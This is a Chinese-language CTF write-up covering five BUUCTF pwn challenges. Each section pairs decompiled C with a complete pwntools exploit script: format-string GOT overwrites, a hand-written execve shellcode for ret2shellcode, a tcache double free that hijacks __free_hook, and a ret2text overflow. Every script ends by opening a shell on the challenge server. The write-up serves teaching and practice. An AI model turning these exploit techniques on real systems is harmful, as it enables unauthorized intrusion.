BUUCTF pwn wp 81 - 85

wdb_2018_2nd_easyfmt

在这里插入图片描述

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char buf[100]; // [esp+8h] [ebp-70h] BYREF -- never NUL-terminated by the code below
  unsigned int v4; // [esp+6Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u); // stack-canary load; the infinite loop below never returns, so no check is visible
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("Do you know repeater?");
  while ( 1 )
  {
    read(0, buf, 0x64u); // 0x64 == sizeof buf: no overflow, but read() adds no terminator and buf is uninitialized
    printf(buf); // format-string bug: user input is the format argument. Fix: printf("%s", buf) or fputs(buf, stdout);
                 // -Wformat-security flags this, and _FORTIFY_SOURCE=2 aborts on %n with a non-literal format.
    putchar(10);
  }
}

fmt漏洞 (printf(buf) 的格式串完全由用户控制)
泄露libc → 打got表
可以用fmtstr_payload打printf_got

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 27466
filename = "./wdb_2018_2nd_easyfmt"
elf = ELF(filename)
libc = ELF("./libc_x86-2.23.so")
context(arch="i386", os="linux")  # 32-bit target: p32/u32 and 4-byte GOT slots below

# Target selection: 0 = the remote instance, anything else = a local process
# started with verbose pwntools logging.
local = 0
if not local:
    io = remote(url, port)
else:
    context.log_level = "debug"
    io = process(filename)

def B():
    """Break into the running target: attach gdb to `io`, then block until resumed."""
    target = io
    gdb.attach(target)
    pause()

def pwn():
    """Exploit the format-string bug in main (printf(buf) with user-controlled buf).

    Step 1 reads printf's GOT entry through the format string to recover the
    libc base; step 2 rewrites that entry so the repeater's next printf(buf)
    call lands in system(). Both steps need the GOT to be writable (no Full
    RELRO) and the non-literal format argument -- either fix blocks the chain.
    """
    printf_got = elf.got['printf']
    
    # The 4-byte GOT address sits at the start of buf; '%6$s' treats that stack
    # slot as a char* and prints what it points to, i.e. the resolved printf address.
    payload = p32(printf_got) + b'%6$s'
    io.sendlineafter("repeater?\n", payload)
    io.recv(4)  # the raw address bytes are echoed first; skip them
    printf_addr = u32(io.recv(4))

    libc_base = printf_addr - libc.sym['printf']
    system_addr = libc_base + libc.sym['system']
    log.info("system address: %#x" % system_addr)

    # pwntools builds the %n write sequence for the same argument offset (6).
    payload = fmtstr_payload(6, {printf_got:system_addr})
    io.sendline(payload)
    # printf's GOT entry now points at system, so printf(buf) becomes system(buf).
    io.sendline(b"/bin/sh\x00")


# Entry point: run the exp, then hand the connection over to the user.
if __name__ == "__main__":
    pwn()
    io.interactive()

axb_2019_fmt64

在这里插入图片描述

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char s[272]; // [rsp+10h] [rbp-250h] BYREF -- raw input
  char format[312]; // [rsp+120h] [rbp-140h] BYREF -- "Repeater:" + input, then used as a printf format
  unsigned __int64 v5; // [rsp+258h] [rbp-8h]

  v5 = __readfsqword(0x28u); // stack canary; main never returns, so it is not verified here
  setbuf(stdout, 0LL);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  puts(
    "Hello,I am a computer Repeater updated.\n"
    "After a lot of machine learning,I know that the essence of man is a reread machine!");
  puts("So I'll answer whatever you say!");
  while ( 1 )
  {
    alarm(3u); // 3-second watchdog per iteration
    memset(s, 0, 0x101uLL); // 0x101 > the 0x100 read below, so s is always NUL-terminated
    memset(format, 0, 0x12CuLL);
    printf("Please tell me:");
    read(0, s, 0x100uLL);
    sprintf(format, "Repeater:%s\n", s); // 9 + 256 + 1 bytes at most, fits in format[312]
    if ( (unsigned int)strlen(format) > 0x10E ) // max length is 266 < 0x10E, so this guard appears unreachable
      break;
    printf(format); // format-string bug: the user text is the format argument. Fix: printf("%s", format) / fputs.
                    // The 9-byte "Repeater:" prefix counts toward printf's output length (relevant to %n writes).
  }
  printf("what you input is really long!");
  exit(0);
}

fmt漏洞
在这里插入图片描述

第8个参数是zzzzzzzz
任意地址读写 → 泄露libc → 打got表

修改strlen到system
在这里插入图片描述

传入;/bin/sh\x00

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 28169
filename = "./axb_2019_fmt64"
elf = ELF(filename)
libc = ELF("./libc_x64-2.23.so")
context(arch="amd64", os="linux")  # 64-bit target: p64/u64 and 8-byte GOT slots below

# Target selection: 0 = the remote instance, anything else = a local process
# started with verbose pwntools logging.
local = 0
if not local:
    io = remote(url, port)
else:
    context.log_level = "debug"
    io = process(filename)

def B():
    """Break into the running target: attach gdb to `io`, then block until resumed."""
    target = io
    gdb.attach(target)
    pause()

def pwn():
    """Exploit the format-string bug in main (printf(format), format = "Repeater:" + input).

    The loop calls strlen() on the same buffer right before printf(), so the
    writeup retargets strlen's GOT entry to system(): the next iteration's
    strlen(format) becomes system("Repeater:;/bin/sh\\n"), where the leading ';'
    ends the bogus "Repeater:" command. A writable GOT (no Full RELRO) and the
    non-literal format argument are the two preconditions.
    """
    puts_got = elf.got['puts']
    strlen_got = elf.got['strlen']

    # Leak: per the writeup, argument 8 is the first 8 bytes of input, so the
    # pointer placed after 8 bytes of text is argument 9; '%9$s' prints what the
    # puts GOT entry points to, i.e. puts' address in libc.
    payload = b"%9$sZZZZ" + p64(puts_got)
    io.sendlineafter("Please tell me:", payload)
    io.recvuntil("Repeater:")
    puts_addr = u64(io.recvuntil(b"\x7f").ljust(8, b"\x00"))  # 6 significant bytes ending in 0x7f
    log.info("puts address: %#x" % puts_addr)

    libc_base = puts_addr - libc.sym['puts']
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh'))  # computed and logged, not used below
    log.info("system address: %#x" % system_addr)
    log.info("binsh address: %#x" % binsh_addr)
    # B()
    # Only the low 3 bytes of the GOT entry are rewritten (the writeup assumes
    # the upper bytes already match system's): byte 2 via %hhn, bytes 0-1 via %hn.
    high_system_addr = (system_addr >> 16) % 0x100
    low_system_addr = system_addr % 0x10000

    # %Nc padding drives printf's output count to each target value; the first
    # subtracts 9 for the "Repeater:" prefix sprintf prepends (see main), the
    # second subtracts what has already been printed.
    payload = b"%" + str(high_system_addr - 9).encode() + b"c%12$hhn"
    payload += b"%" + str(low_system_addr - high_system_addr).encode() + b"c%13$hn"
    # Padding to 32 bytes places the two addresses in the slots that %12$ and
    # %13$ refer to: strlen_got+2 for the byte write, strlen_got for the 2-byte write.
    payload = payload.ljust(32, b"Z") + p64(strlen_got + 2) + p64(strlen_got)

    io.sendafter("Please tell me:", payload)
    # B()
    # strlen's GOT entry now points at system; this input becomes its argument.
    payload = b";/bin/sh"
    io.sendafter("Please tell me:", payload)


# Entry point: run the exp, then hand the connection over to the user.
if __name__ == "__main__":
    pwn()
    io.interactive()

x_ctf_b0verfl0w

在这里插入图片描述

int vul()
{
  char s[32]; // [esp+18h] [ebp-20h] BYREF -- sits 0x20 below the saved ebp

  puts("\n======================");
  puts("\nWelcome to X-CTF 2016!");
  puts("\n======================");
  puts("What's your name?");
  fflush(stdout);
  fgets(s, 50, stdin); // stack overflow: up to 50 bytes (49 + NUL) into a 32-byte buffer, reaching the saved ebp
                       // and return address. Fix: fgets(s, sizeof s, stdin).
  printf("Hello %s.", s); // literal format, so this call itself is fine
  fflush(stdout);
  return 1;
}

ret2shellcode, 但是需要一个小于32字节的shellcode, ret劫持到栈上的shellcode执行即可
构造栈结构如下
在这里插入图片描述
pwntools自带的shellcode是44字节太长了, 所以要自行编写shellcode, 基本功就不啰嗦了

xor eax, eax
xor edx, edx
xor ecx, ecx
push eax                # push '\0'
push 0x68732f2f         # push "//sh"
push 0x6e69622f         # push "/bin"
mov ebx, esp            # ebx <- "/bin//sh\x00"
mov al, 0x0b            # execve() is syscall number 0x0b
int 0x80

在这里插入图片描述

exp
注意exp里的汇编不要带注释

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 26702
filename = "./b0verfl0w"
elf = ELF(filename)
context(arch="i386", os="linux")  # 32-bit target: asm() emits x86 code and p32 is used below

# Target selection: 0 = the remote instance, anything else = a local process
# started with verbose pwntools logging.
local = 0
if not local:
    io = remote(url, port)
else:
    context.log_level = "debug"
    io = process(filename)

def B():
    """Break into the running target: attach gdb to `io`, then block until resumed."""
    target = io
    gdb.attach(target)
    pause()

def pwn():
    """Exploit the stack overflow in vul(): fgets(s, 50, stdin) into a 32-byte buffer.

    Only 18 bytes can go past the buffer, too few to hold pwntools' 44-byte
    shellcode after the return address, so the shellcode lives in the buffer
    itself and the return address is redirected to a gadget that jumps back
    onto it. This needs an executable stack; NX alone would defeat it.
    """
    # Hand-written stub (under 32 bytes); no comments inside, asm() would not accept them.
    shellcode = """
    xor eax, eax
    xor edx, edx
    xor ecx, ecx
    push eax		
    push 0x68732f2f     
    push 0x6e69622f       
    mov ebx, esp           
    mov al, 0x0b            
    int 0x80
    """
    shellcode = asm(shellcode)
    shellcode = shellcode.ljust(0x20, b'\x00')  # fill the 32-byte buffer exactly
    jmp_addr = 0x08048504  # presumably a `jmp esp` gadget in the binary (the stack diagram is not reproduced here) -- confirm
    # After `ret`, esp points just past the return address, i.e. at this stub;
    # `sub esp, 0x28` rewinds 32 + 4 + 4 bytes to the start of the buffer and jumps there.
    sub_jmp_asm = asm("sub esp, 0x28;jmp esp")
    payload = shellcode + cyclic(4) + p32(jmp_addr) + sub_jmp_asm  # buffer | saved ebp | return address | stub
    io.sendline(payload)


# Entry point: run the exp, then hand the connection over to the user.
if __name__ == "__main__":
    pwn()
    io.interactive()

ciscn_2019_es_1

在这里插入图片描述

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+24h] [rbp-Ch] BYREF -- menu choice; only written by scanf, so it stays indeterminate if that read fails
  unsigned __int64 v4; // [rsp+28h] [rbp-8h]

  v4 = __readfsqword(0x28u); // stack canary; main never returns, so it is not verified here
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("I hate 2.29 , can you understand me?"); // hint that the libc predates the 2.29 tcache double-free check (2.27 per the writeup)
  puts("maybe you know the new libc");
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      __isoc99_scanf("%d", &v3); // return value unchecked
      getchar(); // consume the trailing newline
      if ( v3 != 2 )
        break;
      show();
    }
    if ( v3 > 2 )
    {
      if ( v3 == 3 )
      {
        call();
      }
      else
      {
        if ( v3 == 4 )
        {
          puts("Jack Ma doesn't like you~");
          exit(0);
        }
LABEL_13:
        puts("Wrong");
      }
    }
    else
    {
      if ( v3 != 1 )
        goto LABEL_13;
      add();
    }
  }
}
unsigned __int64 add()
{
  int v1; // [rsp+4h] [rbp-3Ch]
  void **v2; // [rsp+8h] [rbp-38h]
  size_t size[5]; // [rsp+10h] [rbp-30h] BYREF -- only size[0] is used, and only its low 32 bits are written by %d
  unsigned __int64 v4; // [rsp+38h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  if ( heap_number > 12 ) // permits indices 0..12 (13 records); the capacity of heap_addr is not visible here
  {
    puts("Enough!");
    exit(0);
  }
  v1 = heap_number;
  *((_QWORD *)&heap_addr + v1) = malloc(0x18uLL); // 0x18-byte record: [0] name ptr, [8] size, [12..23] call string
  puts("Please input the size of compary's name");
  __isoc99_scanf("%d", size); // size is user-controlled and never validated (no upper bound, negative accepted)
  *(_DWORD *)(*((_QWORD *)&heap_addr + heap_number) + 8LL) = size[0];
  v2 = (void **)*((_QWORD *)&heap_addr + heap_number);
  *v2 = malloc(LODWORD(size[0])); // result unchecked; the writeup relies on sizes above tcache's range here
  puts("please input name:");
  read(0, **((void ***)&heap_addr + heap_number), LODWORD(size[0])); // bounded by the allocation, but not NUL-terminated
  puts("please input compary call:");
  read(0, (void *)(*((_QWORD *)&heap_addr + heap_number) + 12LL), 0xCuLL); // bytes 12..23 of the record
  *(_BYTE *)(*((_QWORD *)&heap_addr + heap_number) + 23LL) = 0; // terminate the call string in place
  puts("Done!");
  ++heap_number;
  return __readfsqword(0x28u) ^ v4;
}
unsigned __int64 call()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF -- user-supplied index
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Please input the index:");
  __isoc99_scanf("%d", &v1); // no range check: negative or >= heap_number indexes outside the records written by add()
  if ( *((_QWORD *)&heap_addr + v1) )
    free(**((void ***)&heap_addr + v1)); // double free / use-after-free: the name pointer is freed but never cleared,
                                         // so the same index can be freed again. Fix: NULL the pointer (or the record)
                                         // after free and reject v1 outside [0, heap_number).
  puts("You try it!");
  puts("Done");
  return __readfsqword(0x28u) ^ v2;
}

call()里有个double free

漏洞利用
(1) 开了Full RELRO, 只能打hook
(2) libc2.27存在tcache, 申请超过0x400的chunk绕过tcache
(3) unsorted bin泄露main_arena + 0x60, 进而泄露libc
(4) double free 构造fake chunk到free hook, 劫持free hook
(5) free("/bin/sh\x00"), get shell

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 25350
filename = "./ciscn_2019_es_1"
elf = ELF(filename)
libc = ELF("./libc64-2.27.so")
context(arch="amd64", os="linux")  # 64-bit target: p64/u64 below

# Target selection: 0 = the remote instance, anything else = a local process
# started with verbose pwntools logging.
local = 0
if not local:
    io = remote(url, port)
else:
    context.log_level = "debug"
    io = process(filename)

def B():
    """Break into the running target: attach gdb to `io`, then block until resumed."""
    target = io
    gdb.attach(target)
    pause()

def add(size, name, compary):
    """Menu option 1: create a record with a `size`-byte name and a 12-byte call string.

    `size` is sent as a decimal string; `name` and `compary` are sent raw
    (no trailing newline) because the binary reads them with read().
    """
    steps = (
        (io.sendlineafter, 'choice:', '1'),
        (io.sendlineafter, "compary's name", str(int(size))),
        (io.sendafter, 'input name:', name),
        (io.sendafter, 'call:', compary),
    )
    for send, prompt, data in steps:
        send(prompt, data)

def show(index):
    """Menu option 2: print the record at `index`."""
    choice, idx = '2', str(index)
    io.sendlineafter('choice:', choice)
    io.sendlineafter('\n', idx)

def call(index):
    """Menu option 3: free the name buffer of the record at `index` (the pointer is not cleared by the binary)."""
    choice, idx = '3', str(index)
    io.sendlineafter('choice', choice)
    io.sendlineafter('\n', idx)

def pwn():
    """Exploit the double free in call() (glibc 2.27 tcache) to overwrite __free_hook.

    Follows the writeup's plan: a chunk above tcache's 0x400 limit is freed into
    the unsorted bin and show() leaks a main_arena pointer (libc base); a tcache
    double free on a 0x30 chunk makes malloc return __free_hook; writing system
    there turns the final free("/bin/sh") into system("/bin/sh"). Full RELRO
    rules out the GOT, hence the hook; the tcache double-free key check added
    in glibc 2.29 (which the binary's banner alludes to) would stop step two.
    """
    malloc_hook_libc = libc.sym['__malloc_hook']
    free_hook_libc = libc.sym['__free_hook']
    system_libc = libc.sym['system']

    add(0x400 + 0x10, 'zzzz', 'ffff')   # chunk0: larger than tcache handles, so free() sends it to the unsorted bin
    add(0x28, 'zzzz', 'ffff')           # chunk1: the double-free victim
    add(0x68, '/bin/sh\x00', 'ffff')    # chunk2: the string the final free() will pass to system

    call(0) # free chunk0
    show(0) # leak main_arena + 0x60
    # The freed chunk's fd (now at the start of the name buffer) is main_arena+0x60;
    # the writeup's arithmetic assumes __malloc_hook sits 0x10 below main_arena.
    main_arena_0x60_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    libc_base = main_arena_0x60_addr - 0x60 - 0x10 - malloc_hook_libc
    free_hook_addr = libc_base + free_hook_libc
    system_addr = libc_base + system_libc

    call(1)
    call(1) # double free
    add(0x28, p64(free_hook_addr), 'ffff')  # first allocation writes the tcache fd -> __free_hook
    add(0x28, 'zzzz', 'ffff')  # consumes the duplicated tcache entry
    add(0x28, p64(system_addr), 'ffff') # change free_hook to system
    
    call(2)  # free(chunk2's name) now runs system("/bin/sh")


# Entry point: run the exp, then hand the connection over to the user.
if __name__ == "__main__":
    pwn()
    io.interactive()

suctf_2018_basic pwn

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[268]; // [rsp+10h] [rbp-110h] BYREF -- 0x110 bytes below the saved rbp
  int v5; // [rsp+11Ch] [rbp-4h] -- written, never read

  scanf("%s", s); // unbounded read into a fixed buffer: stack overflow over the saved rbp and return address.
                  // Fix: scanf("%267s", s) or fgets(s, sizeof s, stdin). No canary read appears in this listing.
  v5 = strlen(s);
  printf("Hi %s\n", s);
  return 0;
}

在这里插入图片描述

ret2text, 白给

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 29969
filename = "./SUCTF_2018_basic_pwn"
elf = ELF(filename)
context(arch="amd64", os="linux")  # 64-bit target: p64 below

# Target selection: 0 = the remote instance, anything else = a local process
# started with verbose pwntools logging.
local = 0
if not local:
    io = remote(url, port)
else:
    context.log_level = "debug"
    io = process(filename)

def B():
    """Break into the running target: attach gdb to `io`, then block until resumed."""
    target = io
    gdb.attach(target)
    pause()

def pwn():
    """Exploit the unbounded scanf("%s", s) in main: overflow past s and return into the backdoor.

    s sits 0x110 bytes below the saved rbp (see the decompiled main), so
    0x110 + 8 bytes of filler reach the return address. No canary is read in
    the listing, which is why plain ret2text works.
    """
    back_door_addr = 0x0000000000401157  # presumably the backdoor shown in the writeup's screenshot (not reproduced here) -- confirm
    payload = cyclic(0x110 + 8) + p64(back_door_addr)  # filler up to and over the saved rbp, then the new return address
    io.sendline(payload)


# Entry point: run the exp, then hand the connection over to the user.
if __name__ == "__main__":
    pwn()
    io.interactive()